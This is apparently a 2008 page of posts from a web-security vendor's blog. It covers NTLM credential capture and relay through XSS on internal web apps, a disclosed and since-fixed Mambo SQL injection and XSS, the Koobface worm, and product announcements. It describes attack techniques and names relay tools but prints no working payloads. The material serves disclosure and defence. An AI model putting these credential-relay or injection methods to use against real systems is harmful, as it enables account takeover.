November 20, 2008 | Posted by Sandro Gauci | Filed Under Web Security Articles | No Comments
Many times internal web applications are excluded from the scrutinity that external ones are subjected to. It is often assumed that attackers are on the external side of the network and therefore do not have access to any internal resources. In turn this usually leads to Web Applications being vulnerable to common security flaws such as Cross Site Scripting and SQL injection.
An internal attacker who exploits vulnerabilities on an internal web application, or even one that is external and visited frequently by internal employees, has a number of options. Cross Site Scripting is usually used to steal session cookies, deface websites or inject javascript that attempts to exploit browser vulnerabilities. But what if the vulnerable website starts redirecting internal users to a malicious HTTP server on the internal network that asks for the NTLM authentication? What happens is that it will negotiate and send the NTLM credentials!
What is NTLM? (based on this Wikipedia article)
NTLM (NT LAN Manager) (not to be confused with LAN Manager) is a Microsoft authentication protocol used with the SMB protocol. MS-CHAP is similar and is used for authentication with Microsoft remote access protocols. During protocol negotiation, the internal name is nt lm 0.12. The version number 0.12 has not been explained. It is the successor of LANMAN (Microsoft LAN Manager), an older Microsoft authentication protocol, and attempted to be backwards compatible with LANMAN. NTLM was followed by NTLMv2, at which time the original was renamed NTLMv1.
What can an attacker with NTLM credentials do?
These are a few of the ideas:
- Traditionally attackers would use a password cracker like Cain and Abel to obtain the user’s password from the hash. From there they would proceed to further attacks. However breaking passwords can be a time consuming job.
- With new tools such as Squirtle and Smbrelay3 one no longer needs to obtain the passwords. Instead these attack tools allow malicious users to make use of the NTLM credentials to login as the victim on a target server of their choice. NTLM credentials can then be used on network shares, IMAP servers, SQL servers and any other software that supports this authentication scheme.
Very recently Microsoft published a security patch (MS08-068) that mitigates some of the issues associated with NTLM authentication. This means that if a victim running the latest patches sends his / her NTLM credentials to an attacker’s malicious HTTP server, the attacker can no longer replay these credentials on the victim’s workstation or server. However this patch only protects against this particular scenario, and therefore the attack would still work if the attacker simply accesses a different machine with the victim’s credentials.
What can one do to mitigate this security issue?
From a web application security point of view, it is important to threat internal web applications as part of the attack surface. Although Cross Site Scripting is not the only way of luring victims into automatically sending their NTLM credentials on an internal network, it definitely is one of the most effective. Therefore fixing such vulnerabilities in your internal web applications can help mitigate this and many other attack vectors that may apply to your organization.
November 18, 2008 | Posted by robert Abela | Filed Under Knowledge Base | No Comments
With Acunetix WVS version 6, Acunetix introduced a Port Scanner and Network Alerts. When scanning a website, a port scan against the web server can be launched (optional) and once open ports are found specific network security tests are launched against the network service running on that port. A full range of tests are available, such as DNS open recursion, DNS cache poisoning, badly configured proxy servers, weak SNMP community strings and much more.
These tests are scripts based on Microsoft Active Scripting technology, so one can easily modify them or even write his own tests. Acunetix WVS is shipped with more than 80 network security checks by default and these can be found in [Application Directory]\Data\Scripts\Network.
A full Scripting reference is available here
So start writing your own tests now and let Acunetix know about it, your script might be included in future Acunetix WVS builds!
November 13, 2008 | Posted by Bogdan Calin | Filed Under AcuSensor Technology, Web Security Articles | No Comments
This post shows how with Acunetix AcuSensor Technology improves scanning reliability by using sensors placed inside the web application being scanned. It also proves that with this technology, one can detect SQL injections in INSERT statements. Such vulnerabilities cannot be found using a typical web application black box scanner.
While testing AcuSensor Technology on various open source web applications, we found various 0day vulnerabilities.
The following post shows a real life example of how a SQL injection and a Cross site scripting vulnerability were found in Mambo Version 4.6.2 and 4.6.3. Mambo is one of the world’s most popular open source content management systems.
In the file comment.php (located in the “components\com_comment” directory), we have the following code:
Screenshot 1 – Code from comment.php
The above code is used to insert user generated comments into the database.
We can see that ‘articleid’ parameter is not properly sanitized before being used in the SQL query. This leads to a SQL injection vulnerability in the INSERT SQL statement. This SQL injection can be exploited if magic magic_quotes_gpc is set to OFF.
Another vulnerability is caused by the same input parameter, which is a stored XSS (cross site scripting) vulnerability.
To exploit the vulnerability, we combined both of these vulnerabilities and create a query that will insert a comment with the name and hashed password of the administrator.
The full HTTP request is presented in the screenshot below.
Screenshot 2 – HTTP Request
The application sensors are placed inside the scanned application and can rewrite the source code of the application. For example, sensors will rewrite various database access functions. In PHP, one of these functions is mysql_query. This function will execute an SQL query through the active database connection.
AcuSensor will hook this function and inspect the values passed to this function, being able to reliably detect SQL injection vulnerabilities.
In the screen shot bellow you can see the data returned by the sensor. It’s possible to see the full SQL query, the filename and line number and the complete stack trace. Such information is very helpful for developers to help them troubleshoot and fix the vulnerability in the shortest time possible.
Screenshot 3 – AcuSensor data (SQL query)
Vulnerabilities like these cannot be detected by a typical black box web scanner. An SQL vulnerability in the INSERT statement cannot by detected through blind SQL injection techniques because the INSERT statement does not return anything.
Also, this vulnerability cannot be detected by looking for SQL error messages because this page doesn’t return any error message. When error messages are disabled, a typical black box web scanner will fail.
This kind of vulnerabilities can only be found using the new Acunetix AcuSensor Technology from Acunetix Web Vulnerability Scanner version 6.
This SQL injection vulnerability (and others) were reported to the Mambo Foundation and were fixed in Mambo version 4.6.4. The fix was announced here.
November 12, 2008 | Posted by Sandro Gauci | Filed Under Web Security News | No Comments
A worm abusing Facebook’s messaging system is making rounds between friends. It consists of an executable worm known as Koobface that runs on the victim’s computer and searches for Facebook cookies on his or her computer. It will then use these cookies to hijack an authenticated session and send a message to all of the victim’s friends. This message typically contains a link to a website that will try to infect new victims.
This is not the first worm to make use of social networking sites for distribution. Social networking sites are the perfect way of distributing worms in the Web 2.0 world. By their nature, social networking is virulent - very much like malware - and can help reach a large group of people. Some worms previously made use of web application attacks like Cross Site Scripting (XSS) and Cross Site Request forgery (CSRF). In fact the more complex and popular social networking sites become, the more chance that such sites are used as a platform to launch malware. Usage of technologies such as Ajax make the websites more useful and easier to use. As a side effect, they also tend to expose such sites to new risks that were previously not thought to be a security issue.
For example, Facebook supports online Apps that have been found to hide malicious code. One particular malicious Facebook App called ‘Secret Crush‘ was discovered to be spreading early 2008. It attempted to install adware on the victim computers. Web application vulnerabilities together with a bit of social engineering can proof to be a very effective weapon in a malware writer’s arsenal.
Other posts that mention Koobface:
November 11, 2008 | Posted by robert Abela | Filed Under Web Security Articles | No Comments
Many people think that they will never be a victim of a hacker attack or cyber attack since they have no valuable data stored online therefore they are no ones target. As a matter of fact this is wrong presumption, as web hacking happens for many more reasons than just for stealing data.
A hacker can hack a website to start using its bandwidth to transfer illegal content. The company responsible for the web server has to pay more money to pay for the excessive expensive bandwidth being used and also legal action can be taken against the company as its servers contain illegal content.
Many sites are also hacked so phishing sites can be hosted on a hacked server and many others are even hacked to improve another’s web site ranking in search engines by injecting hidden keywords.
Most of such cases lead to increased expenses and legal actions against the company responsible for the hacked web server, even if they are a victim themselves.
Read more about such attacks, why they happen and how to prevent them from happening here.
November 6, 2008 | Posted by robert Abela | Filed Under White Papers | No Comments
This white paper shows how Acunetix AcuSensor Technology increases accuracy by combining black box scanning techniques with feedback from sensors placed inside the source code while the source code is executed.
Thanks to this innovative technology there are many advantages and many more vulnerabilities can now be found which with a typical black box scanner approach cannot be found. Another main advantage of using such technology is that when reporting a found vunlerability, the report provides more debug information such as the stack trace, the line where the source code leads to the found vulnerability and much more.
This helps developers and pen testers solve the found vulnerabilities in a shorter time and helps them understand more what lead to the reported vulnerability. This also is a mean to train developers to write more secure code in future web applications.
You can read this whitepaper here
October 29, 2008 | Posted by robert Abela | Filed Under Product News | 1 Comment
We are proud to announce the launch of Acunetix Web Vulnerability Scanner Version 6.
With this latest version, Acunetix is launching the new cutting edge AcuSensor Technology, which basically consists of application sensors that allow developers to identify many more vulnerabilities than when using a traditional web application scanner. This innovative security technology generates less false positives, provides more tools, and offers more options for vulnerability tests, setting new standards in web vulnerability scanning.
Read more about Acunetix and Version 6 release in this press release
Check out the FREE Version of Acunetix WVS V6 from here
Download the Acunetix WVS Version6 manual from here
The new features of Version 6 are:
* AcuSensor Technology (Application Sensors) – In addition to allowing you to identify more vulnerabilities than with a traditional web application scanner with less false positives, it also indicates exactly where the vulnerability is in your code, and reports debug information.
* Blind SQL Injector Tool - Ideal for penetration testers, the Blind SQL injector is an automated database data extraction tool that is perfect for making manual tests that allow further testing for SQL injections. You can read more about this in Chapter 10 of the manual.
* Port Scanner and Network Alerts - Perform a port scan against the web server and when open ports are found, Acunetix WVS does complex network level security checks against the service running on that port, such as DNS Open recursion tests, weak SNMP community strings and many other network level security checks. You can also edit these fully scriptable network security tests from the vulnerability editor and also write your own network security scripts.
We have also achieved some major improvements with Version 6:
Pause and Resume now available for scanning and crawling session.
Possibility to scan websites protected with NTLMv2 authentication.
Option to mark an alert as a false positive. The list of false positives can be customized from the application settings.
The scanner can now generate a list of Uncommon HTTP responses such as Internal Server error – HTTP 500, server stopped responding, etc.
Option to configure the scanner to stop if a number of network errors occur.
Possibility to quickly locate vulnerability by using a filter when before it was only possible to search and not filter.
Compare results tool can now compare Knowledge Base items and list of open ports.
Much more flexible scheduler; ability to specify a specific day in a weekly or monthly schedule, and ability to also configure all scanning options available through the scheduler.
Note: In the FREE Version there is no need to configure the AcuSensor Password to scan the test websites as it is hardcoded in the application.
October 24, 2008 | Posted by robert Abela | Filed Under Web Security News | No Comments
Hackers are clearly becoming more sophisticated than ever these days, not only operating within a very close-knit web hacking community of sites and blogs, but now also creating their own automated and free SQL Injection attack tools and making them availble for the public.
These tools, which are marketed openly as developed for ’security auditing’, help hackers to easily recognize potentially vulnerable web sites that can fall victims to massive SQL injections.
Web developers should be asking themselves what to do against this major threat.
Knowing that vulnerable web applications are the target of SQL injection and other web hacking techniques, the logical thing to do is to stay a step ahead of hackers and prevent these web site attacks from happening by identifying web application vulnerabilities before these are hacked.
Read how Acunetix Web Vulnerability Scanner helps you prevent these sophisticated attacks on your web applications here.
Read more about the free SQL injection attack tools available to hackers here.
October 22, 2008 | Posted by Bogdan Calin | Filed Under Knowledge Base | No Comments
If you try to run AcuSensor Injector on Windows Server 2008 you will receive the error “Error populating websites, Unknown error (0×80005000)”.
AcuSensor Injector is using Active Directory Service Interfaces (ADSI) to construct a list of websites and virtual directories. ADSI is not available by default on Windows Server 2008.
To solve this problem you need to install the role service named IIS 6 Metabase Compatibility.
To do this, follow these steps:
1. Click Start, and then click Control Panel.
2. Click Programs and Features.
3. Click Turn Windows features on or off.
4. On Roles Summary group, click on Web Server (IIS) role
5. On Roles Services group, click on Add Role Services.
6. Go to Management Tools->IIS 6 Management Compatibility and enable IIS 6 Metabase Compatibility.
7. Click Next and Install.
IIS 6 Metabase Compatibility
October 21, 2008 | Posted by robert Abela | Filed Under Web Security Articles | No Comments
While we depend more and more on web-based technologies every day, web applications are growing and offering more functionality every day. Such growth brings with it more complex designs which most of the time puts the application security at risk. A malicious user who exploits a web application vulnerability present in your web application, can halt all your company’s operations and cost you money.
Learn more about Web Application security and the risks they bring with them in this article.
Next Page »
